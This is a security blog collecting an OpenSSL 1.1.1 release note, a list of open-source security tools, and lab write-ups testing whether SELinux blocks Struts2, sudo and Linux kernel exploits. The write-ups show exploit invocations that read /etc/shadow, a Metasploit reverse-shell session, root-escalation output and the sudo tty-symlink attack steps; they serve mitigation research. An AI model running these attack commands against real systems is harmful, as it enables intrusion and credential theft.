OSSセキュリティ技術の会（Secure OSS SIG) blog

2018年9月12日水曜日

OpenSSL 1.1.1リリース

OpenSSL 1.1.1がリリースされたようです。

一次情報源

OpenSSL Blog: OpenSSL 1.1.1 Is Released

今回の1.1.1はLTS(Long Time Support)となるため、調べておいたほうが良い情報だと思われます。

今回の目玉はやはりTLS1.3のサポートです。

主な更新はこちらになるようです。

クライアントとサーバ間での必要な往復の回数を削減することによる接続時間の改善
特定の状況でクライアントが暗号化されたデータを、サーバが必要とするラウンドトリップなしに送ることが出来る機能(0-RTT)
特定の状況でクライアントが暗号化されたデータを、サーバが必要とするラウンドトリップなしに送ることが出来る機能(0-RTT)
OpenSSLの乱数生成器の完全な書き直し
- デフォルトのRANDメソッドはNIST Standard SP800-90Ar1に沿う為、AES-CTR DRBGを使用
- 複数のDRBGインスタンスをサポート
- パブリック・プライベートのDRBGインスタンスを使用
- DRBGはfork-safe
- 全てのグローバルDRBGはセキュアヒープが有効にされている場合にはそちらで
- パブリック・プライベートのDRBGインスタンスはスレッドごとにロックフリー操作が可能
新規アルゴリズムのサポート
- SHA3
- SHA512/224 and SHA512/256
- EdDSA (including Ed25519 and Ed448)
- X448 (adding to the existing X25519 support in 1.1.0)
- Multi-prime RSA
- SM2
- SM3
- SM4
- SipHash
- ARIA (including TLS support)

2018年4月23日月曜日

カテゴリ一覧（逐次更新）

ネットワーク
1. ファイアウォール
  1. netfilter(https://www.netfilter.org/)
  2. firewalld(https://www.firewalld.org/)
2. プロキシ
  1. Squid(http://www.squid-cache.org/)
3. IDS/IPS
  1. Snort(https://snort.org/)
4. WAF
  1. ModSecurity(https://www.modsecurity.org/)
  2. NAXSI(https://github.com/nbs-system/naxsi)
5. パケットキャプチャ/解析
  1. Moloch(https://github.com/aol/moloch)
運用監視・管理・レポーティング
1. 運用監視
  1. Nagios(https://www.nagios.org/)
  2. Zabbix(https://www.zabbix.com/)
  3. Cacti(https://www.cacti.net/)
2. パッチ・コンテンツ管理
  1. Katello(https://theforeman.org/plugins/katello/)
  2. Spacewalk(https://spacewalkproject.github.io/)
3. 脆弱性管理
  1. OpenSCAP(https://www.open-scap.org/)
  2. OpenVAS(http://openvas.org/)
  3. Vuls(https://github.com/future-architect/vuls)
4. SIEM
  1. OSSIM(https://www.alienvault.com/products/ossim/)
  2. SIEMonter(https://siemonster.com/)
5. ネットワークセキュリティ監視
  1. Bro(https://www.bro.org/)
6. ネットワークフォレンジック解析
  1. Xplico(http://www.xplico.org/download)
7. レポーティング
  1. Dradis(https://dradisframework.com/ce/)
8. 情報収集
  1. Maltego(https://www.paterva.com/web7/)
9. インシデント・レスポンス
  1. Google Rapid Response(https://github.com/google/grr)
  2. TheHive(https://github.com/TheHive-Project/TheHive)
OS
1. アクセス制御
  1. SELinux
  2. AppArmor
  3. SMACK
  4. TOMOYO
2. セキュリティツール専用OS
  1. SECURITY ONION(https://securityonion.net/)
  2. SIFT(https://digital-forensics.sans.org/community/downloads)
システム連携
1. 認証・アクセス管理
2. ディレクトリサービス
3. ID管理
暗号化
1. SSL
  1. OpenSSL(https://www.openssl.org/)
  2. LibreSSL(http://www.libressl.org/)
2. SSH
  1. OpenSSH(https://www.openssh.com/)
  2. Apache MINA SSHD(https://mina.apache.org/sshd-project/index.html)
3. VPN
  1. OpenVPN(https://openvpn.net/)
スキャン・攻撃解析及びテスト
1. ポートスキャン
  1. nmap (https://nmap.org/)
2. マルウェア解析
  1. IRMA (http://irma.quarkslab.com/)
  2. Malice (https://github.com/maliceio/malice)
  3. MISP (http://www.misp-project.org/)
3. 攻撃解析
  1. Cortex (https://github.com/TheHive-Project/Cortex)
4. リバースエンジニアリング
  1. radare2 (https://github.com/radare/radare2)
5. サンドボックス
  1. Cuckoo (https://cuckoosandbox.org/)
6. 侵入テスト
  1. Metasploit Framework(https://github.com/rapid7/metasploit-framework)
  2. Kali Linux(https://www.kali.org/)

その他指摘事項

サーバ仮想化 --> 仮想化に直してはどうか？
1. VM
  1. qemu
  2. KVM
  3. Xen
  4. VirtualBox
2. コンテナ
  1. Docker
  2. OpenVZ
  3. LXC/LXD
  4. containerd
  5. runc
  6. cri-o
3. 関連ソフトウェア
  1. virt-manager
  2. libvirt
  3. VirtualBox
4. DragonFly BSD --> 「仮想化」でしょうか？
Cloud Native Storageの追加(https://raw.githubusercontent.com/cncf/landscape/master/landscape/CloudNativeLandscape_latest.png)
1. LeoFS(https://leo-project.net/leofs/)

2017年9月11日月曜日

S2-052: CVE-2017-9805(Struts2) PoC with SELinux

We did recently "Important" Struts2 vulnerability(CVE-2017-9805) PoC to check how SELinux can mitigate that vulnerability.

(Written by Kazuki Omo:ka-omo@sios.com).

Prepare for PoC

Here is a description how to reproduce it. I used CentOS7 image for the PoC. I used VMWare Guest(CPU: 1, Memory: 2GB) for the PoC. Also, I used selinux-policy-targeted-3.13.1-145.el7.noarch (See related post: http://www.secureoss.jp/post/omok-selinux-struts2-20170607/).

Install tomcat and related packages for working Struts2.
Download and install vulnerable version of Struts2. I used struts-2.5.11. Copy struts2-showcase.war and struts2-rest-showcase.war under /var/lib/tomcat/webapps
```
root@centos7:~# ls /var/ls /var/lib/tomcat/webapps/*war
/var/lib/tomcat/webapps/struts2-showcase.war
/var/lib/tomcat/webapps/struts2-rest-showcase.war
```
Prepare Metasploit for the PoC. You can easy to use "Kali Linux(https://www.kali.org/downloads/)" for running Metasploit Framework. Run "apt-get update ; apt-get upgrade" for updating Kali Linux completely, then follow the procedure for running CVE-2017-9805 PoC (Set up Metasploit Module for Apache Struts2 Rest : http://hackersgrid.com/2017/09/metasploit-module-for-apache-struts-2-rest-cve-2017-9805.html).

To avoid normal Unix permission check for the PoC, I changed /etc/shadow permission to 755.

root@centos7:~# ls -lZ /etc/shadow
-rwxr-xr-x. root root system_u:object_r:shadow_t:s0        /etc/shadow

PoC with no SELinux(SELinux Permissive)

Confirm SELinux is Permissive mode;
```
root@centos7:~# getenforce
Permissive
```

Run PoC from msfconsole(Metasploit). AA.AA.AA.AA is Kali Linux IP, and XX.XX.X.XX is Struts2 PoC server;

 msf exploit(struts2_rest_xstream) > exploit

 [*] Started reverse TCP double handler on AA.AA.AA.AA:4444 
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
 [*] Command: echo DxP98C50UAVxX6jn;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
 [*] Reading from socket B
 [*] B: "DxP98C50UAVxX6jn\r\n"
 [*] Matching...
 [*] A is input...
 [*] Command shell session 2 opened (AA.AA.AA.AA:4444 -> XX.XX.XX.XX:43584) at 2017-09-11 15:42:12 +0900

 id
 uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0

 root:XXXXXX.::0:99999:7:::
 bin:*:17110:0:99999:7:::
 daemon:*:17110:0:99999:7:::
 --snip--
 sshd:!!:17247::::::
 jssosug:XXXXXXXXXXXX::0:99999:7:::

 jsossug@vmhost:~$

PoC with SELinux Enabled(SELinux Enforcing)

Reboot and set SELinux as Enforcing.
```
root@centos7:~# getenforce
Enforcing
```

Run PoC from msfconsole(Metasploit). AA.AA.AA.AA is Kali Linux IP, and XX.XX.X.XX is Struts2 PoC server;

 msf exploit(struts2_rest_xstream) > exploit

 [*] Started reverse TCP double handler on AA.AA.AA.AA:4444 
 [*] Accepted the first client connection...
 [*] Accepted the second client connection...
 [*] Command: echo DxP98C50UAVxX6jn;
 [*] Writing to socket A
 [*] Writing to socket B
 [*] Reading from sockets...
 [*] Reading from socket B
 [*] B: "DxP98C50UAVxX6jn\r\n"
 [*] Matching...
 [*] A is input...
 [*] Command shell session 2 opened (AA.AA.AA.AA:4444 -> XX.XX.XX.XX:43584) at 2017-09-11 15:49:01 +0900

 id 
 uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=system_u:system_r:tomcat_t:s0

 cat /etc/shadow
 cat: /etc/shadow: Permission denied

Check AVC log on Struts PC;

type=AVC msg=audit(1505112552.257:431): avc:  denied  { read } for  pid=4684 comm="cat" name="shadow" dev="dm-1" ino=34690693 scontext=system_u:system_r:tomcat_t:s0 tcontext=system_u:object_r:shadow_t:s0 tclass=file

Conclusion

From this PoC we can say

Latest SELinux can mitigate Struts2 vulnerability "if Policy is updated".

2017年8月9日水曜日

S2-048: CVE-2017-9791(Struts2) PoC with SELinux

We did another "Famous" Struts2 vulnerability(CVE-2017-9791) PoC to check how SELinux can mitigate that vulnerability.

(Written by Kazuki Omo:ka-omo@sios.com).

Prepare for PoC

Here is a description how to reproduce it. I used Fedora25 image for the PoC. I used VMWare Guest(CPU: 1, Memory: 2GB) for the PoC. Actually, this PoC environment is almost same as Previous vulnerability (CVE-2017-5638 which we did on June.). Also, I used selinux-policy-targeted-3.13.1-225.11.fc25.noarch because previous policy had un-confined tomcat_t policy(See http://www.secureoss.jp/post/omok-selinux-struts2-20170607/).

Install tomcat and related packages for working Struts2.
Download and install vulnerable version of Struts2. I used both of struts-2.5.10. Copy struts2-showcase.war under /var/lib/tomcat/webapps
```
root@fedora25:~# ls /var/ls /var/lib/tomcat/webapps/*war
/var/lib/tomcat/webapps/struts2-showcase.war
```
Download and copy the PoC code on remote. There are many sample site for the PoC, then I'm not explaining it in here.

To avoid normal Unix permission check for the PoC, I changed /etc/shadow permission to 755.

root@fedora25:~# ls -lZ /etc/shadow
-rw-r--r--. root root system_u:object_r:shadow_t:s0        /etc/shadow

PoC with no SELinux(SELinux Permissive)

Confirm SELinux is Permissive mode;
```
root@fedora25:~# getenforce
Permissive
```

Run PoC from remote host(jssosug@vmhost);

 jsossug@vmhost:~$ python Struts048.py http://172.16.148.147:8080/struts2-showcase/integration/saveGangster.action "cat /etc/shadow"

 root:XXXXXX.::0:99999:7:::
 bin:*:17110:0:99999:7:::
 daemon:*:17110:0:99999:7:::
 --snip--
 sshd:!!:17247::::::
 jssosug:XXXXXXXXXXXX::0:99999:7:::

 jsossug@vmhost:~$

PoC with SELinux Enabled(SELinux Enforcing)

Reboot and set SELinux as Enforcing.
```
root@fedora25:~# getenforce
Permissive
```

Run PoC from remote same as before;

jsossug@vmhost:~$ python Struts048.py http://172.16.148.147:8080/struts2-showcase/integration/saveGangster.action "cat /etc/shadow"
cmd: cat /etc/shadow

cat: /etc/shadow: Permission denied

Check AVC log on Struts PC;

type=AVC msg=audit(1598882036.160:219): avc:  denied  { read } for  pid=4413 comm="cat" name="shadow" dev="dm-1" ino=34456196 scontext=system_u:system_r:tomcat_t:s0 tcontext=system_u:object_r:shadow_t:s0 tclass=file

Conclusion

From this PoC we can say

SELinux can mitigate Struts2 vulnerability "if Policy is updated".;
Last SELinux Policy is treating "tomcat_t" as "unconfined domain".
Latest version of SELinux Policy will solve the problem.

2017年6月24日土曜日

sudo vulnerability detail with SELinux(CVE-2017-1000367/CVE-2017-1000368)

There's much misunderstanding about "sudo" vulnerability(CVE-2017-1000367/1000368) that "SELinux caused some vuulnerable". On this blog, we will describe details about tha vulnerability and why it is depending on SELinux.

(Written by Kazuki Omo:ka-omo@sios.com).

Vulnerability Details

You can easy to find the details of "what is the vulnerability" on Qualys Security Advisory(http://www.openwall.com/lists/oss-security/2017/05/30/16).

Actually, this vulnerability is completely comes from "sudo" source code.

As the description on above Qualys Security Advisory, main problem is "sudo behaivor when he get space-contained command".

When someone run sudo, sudo program will get user information(user_info: uid, cwd, etc.) by calling get_user_info(). And get_user_info() will call sudo_ttyname_dev()->sudo_ttyname_scan() for device "breadth-first scan". During the sudo_ttyname_scan(), it will obtain "tty number for that process running" by 7th field on "/proc/[pid]/stat".

ex. When you run mlayer on /dev/pts/0(tty) as pid=2778:

    jsossug@cent7enc:~$ cat /proc/2778/stat
    2778 (mplayer) S 2366 2778 2366 34816 2778 1077936128 10433 ....

From above output, "34816" is the dev number.
"34816"(Dec) -> "0000 0000 0000 0000 1000 1000 0000 0000"(BN). Maigor number is "31-20 bit + 7-0 bit". Minor number is "19-8" bit. Then Major number is "000010001000 = 136", and Minor number is "0000 0000 0000 0000 = 0". .

For the confirmation, check "ls -l /dev/pts/0" output;

jsossug@cent7enc:~$ ls -l /dev/pts/0
crw--w---- 1 jsossug tty 136, 0 Jun 22 12:49 /dev/pts/0

From above output, you can see "136,0" which is "Major, Minor" number.

The problem is /proc/[pid]/stat file is "space-separated" output. So, if someone run "cmd" which contain space, sudo_ttyname_scan() will treat other field as tty name(this is mainly bug).

When Malicious attacker will run cmd with 6-spaces, he can easy to change tty number to any number. And if he can change that tty's symbolic link to file, and treat that file as stdout, he can overwrite that file whatever he wants. For this sequence, attacker can use sudo's SELinux implementation.

How to attack

Here is the steps for attacking;

Create /dev/shm/_tmp which is world-writable directory.
```
jsossug@cent7enc:/dev/shm$ mkdir _tmp
```

Create symbolic link "/dev/shm/_tmp/tty" as non-existent pts "/dev/pts/57".

jsossug@cent7enc:/dev/shm$ ln -s /dev/pts/57 /dev/shm/_tmp/tty
jsossug@cent7enc:/dev/shm$ ls -l /dev/shm/_tmp
lrwxrwxrwx. 1 jsossug jsossug 11  Jun 22 09:02 tty -> /dev/pts/57

"/dev/pts/57" device number will be "34873" as above explanation. So, create symbolic link "/dev/shm/_tmp/ 34873" for "/usr/bin/sudo".

[jsossug@cent7enc _tmp]$ ln -s /usr/bin/sudo "/dev/shm/_tmp/     34873 "
[jsossug@cent7enc _tmp]$ ls -l
lrwxrwxrwx. 1 jsossug jsossug 13  Jun 22 09:07      34873  -> /usr/bin/sudo

Use inotify for monitoring IN_OPEN on /dev/shm/_tmp directory. When /dev/shm/_tmp directory is accessed, change /dev/shm/_tmp/_tty to file which you want to overwrite(/etc/passwd, for example).

So, how SELinux is involved on this vulnerability?

On above step 4, sudo program will think his tty is "/dev/shm/_tmp" which is linked to "/etc/passwd".

If SELinux is enabled on the system(doesn't matter Enforcing or Permissive), and "-r Role" option is specified , exec_setup() in sudo will call selinux_setup();

bool
exec_setup(struct command_details *details, const char *ptyname, int ptyfd)
{
--snip-- 
#ifdef HAVE_SELINUX
    if (ISSET(details->flags, CD_RBAC_ENABLED)) {
        if (selinux_setup(details->selinux_role, details->selinux_type,
            ptyname ? ptyname : user_details.tty, ptyfd) == -1)
            goto done;
    }
#endif

selinux_setup() will call relabel_tty() for relabeling the tty;

int
selinux_setup(const char *role, const char *type, const char *ttyn,
    int ptyfd)
{
--snip--
    if (relabel_tty(ttyn, ptyfd) < 0) {
        warning(_("unable to setup tty context for %s"), se_state.new_context);
        goto done;
    }

During the relabel_tty(), program will re-open ttyn which is now "/etc/passwd".

--snip--
        /* Re-open tty to get new label and reset std{in,out,err} */
        close(se_state.ttyfd);
        se_state.ttyfd = open(ttyn, O_RDWR|O_NONBLOCK);
--snip--

And call dup2(se_state.ttyfd, ptyfd) for duplicating fd.

--snip--
                for (fd = STDIN_FILENO; fd <= STDERR_FILENO; fd++) {
                    if (isatty(fd) && dup2(se_state.ttyfd, fd) == -1) {
--snip--

Then stdin/stdout/stderr will be set as /etc/passwd. So now the "cmd" stdout/stderr will be /etc/passwd, then you can overwrite /etc/passwd if you control the cmd output!!

PoC with SELinux enabled.

PoC is available on the Internet. In here, we use /etc/motd(only root can write) for attack file. And use "/usr/bin/sum" for the command, then add /usr/bin/sum as permitted command for "sudovul(test user)".

    sudovul ALL=(ALL)NOPASSWD:/usr/bin/sum

Confirm SELinux is Permissive mode;

sudovul@cent7enc:~# getenforce
Permissive

Run PoC on localhost as sudovul;

 [sudovul@cent7enc sudo-CVE-2017-1000367]$ ./sudopwn
 [sudovul@cent7enc sudo-CVE-2017-1000367]$ cat /etc/motd
 /usr/bin/sum: unrecognized option '--
 HELLO
 WORLD
 '
 Try '/usr/bin/sum --help' for more information.

Change SELinux to Enforcing mode;

sudovul@cent7enc:~# getenforce
Enforcing

Clear /etc/motd and run PoC on localhost as sudovul;

 [sudovul@cent7enc sudo-CVE-2017-1000367]$ ./sudopwn
 [sudovul@cent7enc sudo-CVE-2017-1000367]$ cat /etc/motd
 /usr/bin/sum: unrecognized option '--
 HELLO
 WORLD
 '
 Try '/usr/bin/sum --help' for more information.

So, we can overwrite /etc/motd in SELinux Permissive/Enforcing Mode.

PoC with SELinux Disabled

set SELinux as Disabled in /etc/selinux/config, and reboot.
```
root@cent7enc:~# getenforce
Disabled
```

Clear /etc/motd, and run PoC code again.

[sudovul@cent7enc sudo-CVE-2017-1000367]$ ./sudopwn
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.

Check /etc/motd is not modified.

[sudovul@cent7enc sudo-CVE-2017-1000367]$ cat /etc/motd
[sudovul@cent7enc sudo-CVE-2017-1000367]$

Conclusion

From above Vulnerability details and PoC, we can say;

The main vulnerability is coming from sudo.
SELinux is not exactlly used for the attack. Sudo will open tty and dup the fd for relabeling tty(malicious user can use it for attack).
This Vulnerablity condition is SELinux Enabled(not only Enforcing, but also Permissive.). For fixing the problem, update sudo package.

2017年6月8日木曜日

CVE-2017-5638(Struts2) PoC with SELinux

We did "Famous" Struts2 vulnerability(CVE-2017-5638) PoC to check how SELinux can mitigate that vulnerability. During the PoC, we found current policy problem, then reported it on bugzilla. So, I would write the information for that PoC and SELinux policy problem.
(Written by Kazuki Omo:ka-omo@sios.com).

Prepare for PoC

Here is a description how to reproduce it. I used CentOS 7.3(CentOS-7-x86_64-DVD-1611.iso)image for the PoC. I used VMWare Guest(CPU: 1, Memory: 2GB) for the PoC.

Install tomcat and related packages for working Struts2.
Download and install vulnerable version of Struts2. I used both of struts-2.5.10. Copy struts2-showcase.war under /var/lib/tomcat/webapps
```
root@cent7enc:~# ls /var/ls /var/lib/tomcat/webapps/*war
/var/lib/tomcat/webapps/struts2-showcase.war
```
Download and copy the PoC code on remote. There are many sample site for the PoC, then I'm not explaining it in here.

To avoid normal Unix permission check, I changed /etc/shadow permission to 755.

root@cent7enc:~# ls -lZ /etc/shadow
-rw-r--r--. root root system_u:object_r:shadow_t:s0        /etc/shadow

PoC with no SELinux(SELinux Permissive)

Confirm SELinux is Permissive mode;
```
root@cent7enc:~# getenforce
Permissive
```

Run PoC from remote host(jssosug@vmhost);

 jsossug@vmhost:~$ python attack.py http://172.16.148.130:8080/struts2-showcase/showcase.action "cat /etc/shadow"
 CVE: 2017-5638 - Apache Struts2 S2-045
 cmd: cat /etc/shadow
 root:XXXXXX.::0:99999:7:::
 bin:*:17110:0:99999:7:::
 daemon:*:17110:0:99999:7:::
 --snip--
 sshd:!!:17247::::::
 jssosug:XXXXXXXXXXXX::0:99999:7:::

 jsossug@vmhost:~$

PoC with SELinux Enabled(SELinux Enforcing)

Reboot and set SELinux as Enforcing.
```
root@cent7enc:~# getenforce
Permissive
```

Run PoC code again. Even if SELinux is Enforcing, still you can see /etc/shadow(so bad...);

jsossug@vmhost:~$ python attack.py http://172.16.148.130:8080/struts2-showcase/showcase.action "cat /etc/shadow"
CVE: 2017-5638 - Apache Struts2 S2-045
cmd: cat /etc/shadow

root:XXXXXX.::0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
--snip--
sshd:!!:17247::::::
jssosug:XXXXXXXXXXXX::0:99999:7:::

jsossug@vmhost:~$

Check SELinux Policy

Now we understand that SELinux can't mitigate CVE-2017-6074. Why it is happened?

For understanding it, attack from remote(vmhost) by using below command;

jsossug@vmhost:~$ python attack.py http://172.16.148.130:8080/struts2-showcase/showcase.action "vi /tmp/abcd" 
CVE: 2017-5638 - Apache Struts2 S2-045
cmd: vi /tmp/abcd

On Struts PC, check domain who is running "vi /tmp/abcd";

root@cent7enc:~# ps axZ|grep abcd
system_u:system_r:tomcat_t:s0         3251 ?                S          0:00 vi /tmp/abcd

Check "tomcat_t" inheriented domain with seinfo;

root@cent7enc:~# seinfo -ttomcat_t -x
tomcat_t
  can_change_object_identity
  can_load_kernmodule
  can_setbool
  can_setenforce
  corenet_unconfined_type
  corenet_unlabeled_type
  devices_unconfined_type
  domain
  files_unconfined_type
  filesystem_unconfined_type
  kern_unconfined
  kernel_system_state_reader
  process_uncond_exempt
  selinux_unconfined_type
  storage_unconfined_type
  unconfined_domain_type
  dbusd_unconfined
  daemon
  syslog_client_type
  sepgsql_unconfined_type
  tomcat_domain
  userdom_filetrans_type
  x_domain
  xserver_unconfined_type

So we found tomcat_t is in several "unconfined" domain. I reported it on bugzilla(https://bugzilla.redhat.com/show_bug.cgi?id=1432083), then fixed version of policy(selinux-policy-3.13.1-145.el7.noarch.rpm)

Check SELinux Updated Policy

Fixed version of policy is in RHEL-7.4Beta image. Just for confirmation, I installed those policy on CentOS7(PoC).

root@cent7enc:~# rpm -Fvh selinux-policy-3.13.1-145.el7.noarch.rpm selinux-policy-targeted-3.13.1-145.el7.noarch.rpm

root@cent7enc:~# getenforce
Enforcing

Run PoC from remote same as before;

jsossug@vmhost:~$ python attack.py http://172.16.148.130:8080/struts2-showcase/showcase.action "cat /etc/shadow" 
CVE: 2017-5638 - Apache Struts2 S2-045
cmd: cat /etc/shadow

cat: /etc/shadow: Permission denied

Check AVC log on Struts PC;

type=AVC msg=audit(1496882036.860:219): avc:  denied  { read } for  pid=4413 comm="cat" name="shadow" dev="dm-1" ino=34456196 scontext=system_u:system_r:tomcat_t:s0 tcontext=system_u:object_r:shadow_t:s0 tclass=file

Check "tomcat_t" inheriented domain with seinfo;

root@cent7enc:~# seinfo -ttomcat_t -x
tomcat_t
  nsswitch_domain
  corenet_unlabeled_type
  domain
  kernel_system_state_reader
  netlabel_peer_type
  daemon
  syslog_client_type
  pcmcia_typeattr_7
  pcmcia_typeattr_6
  pcmcia_typeattr_5
  pcmcia_typeattr_4
  pcmcia_typeattr_3
  pcmcia_typeattr_2
  pcmcia_typeattr_1
  tomcat_domain

So now we can see no "Unconfined" domain in there.

Conclusion

From this PoC we can say

SELinux can mitigate Struts2 vulnerability if "Policy is good.";
Last SELinux Policy is treating "tomcat_t" as "unconfined domain".
Latest version of SELinux Policy will solve the problem.

2017年3月5日日曜日

CVE-2017-6074 PoC with SELinux(on Ubuntu)

We found that PoC code for CVE-2017-6074 was published since 2017/02/28. Then we did PoC with SELinux Enabled, and figure out SELinux could mitigate it or not.
(Written by Kazuki Omo:ka-omo@sios.com).

Prepare for PoC

Here is a description how to reproduce it. I used Ubuntu 16.04.1 LTS with 4.4.0-62-generic x86_64 kernel on VMWare Guest, because this PoC code is only for that distro/version. Also I assigned only 1 CPU to that guest.

Install 4.4.0-62-generic kernel on Ubuntu. You can find it on any mirror site.

Prepare SELinux on Ubuntu. I prefer to use "aptitude" instead of "apt".

root@ubuntu:~# aptitude -y install selinux
The following NEW packages will be installed:
  checkpolicy{a} libapol4{a} libauparse0{a} libpython-stdlib{a} 
  libpython2.7-minimal{a} libpython2.7-stdlib{a} libqpol1{a} m4{a} make{a} 
  policycoreutils{a} python{a} python-audit{a} python-ipy{a} 
  python-minimal{a} python-selinux{a} python-semanage{a} python-sepolgen{a} 
  python-sepolicy{a} python-setools{a} python2.7{a} python2.7-minimal{a} 
  selinux{b} selinux-policy-default{a} selinux-policy-dev{a} 
  selinux-policy-ubuntu{ab} selinux-utils{a} setools{a} 
0 packages upgraded, 27 newly installed, 0 to remove and 131 not upgraded.
--snip--
Processing triggers for initramfs-tools (0.122ubuntu8.1) ...
update-initramfs: Generating /boot/initrd.img-4.4.0-62-generic
W: mdadm: /etc/mdadm/mdadm.conf defines no arrays.

Current status: 125 (-6) upgradable.
root@ubuntu:~# reboot

Download and copy the PoC code.

jsossug@ubuntu:~/CVE-2017-6074$ ls
poc.c  README.md  trigger.c
jsossug@ubuntu:~/CVE-2017-6074$

Compile that code on PoC Ubuntu 16.04.1 LTS;

jsossug@ubuntu:~/CVE-2017-6074$ gcc -o pwn poc.c 
jsossug@ubuntu:~/CVE-2017-6074$ ls
poc.c  pwn  README.md  trigger.c
jsossug@ubuntu:~/CVE-2017-6074$

PoC with no SELinux(SELinux Permissive)

Confirm SELinux is Permissive mode;

jsossug@ubuntu:~/CVE-2017-6074$ getenforce
Permissive

Run PoC bindary;

jsossug@ubuntu:~/CVE-2017-6074$ ./pwn
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x402043
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@ubuntu:/home/jsossug/CVE-2017-6074# ls /root/.bashrc
/root/.bashrc
root@ubuntu:/home/jsossug/CVE-2017-6074# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
root@ubuntu:/home/jsossug/CVE-2017-6074# cat /etc/shadow
root:XXXXXXXXXXXX:13219:0:99999:7:::
daemon:*:12041:0:99999:7:::
bin:*:12041:0:99999:7:::
--snip--

PoC with SELinux Enabled(SELinux Enforcing)

Reboot and set SELinux as Enforcing.
jsossug@ubuntu:~/CVE-2017-6074$ getenforce Enforcing
Run PoC code again;
jsossug@ubuntu:~/CVE-2017-6074$ ./pwn [.] namespace sandbox setup successfully [.] disabling SMEP & SMAP [.] scheduling 0xffffffff81064550(0x406e0) socket(SOCK_DCCP): Permission denied
Check AV log. We can find kernel_t(pwn command domain) couldn't create dccp_secket Object Class.;
Mar 5 19:39:54 ubuntu kernel: [ 67.029899] audit: type=1400 audit(1488710394.317:38): avc: denied { create } for pid=4372 comm="pwn" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=dccp_socket permissive=0

Conclusion

Now we understand that SELinux can mitigate CVE-2017-6074 through PoC.
So we can say it's better to enable SELinux for keeping your system secure.

登録: 投稿 (Atom)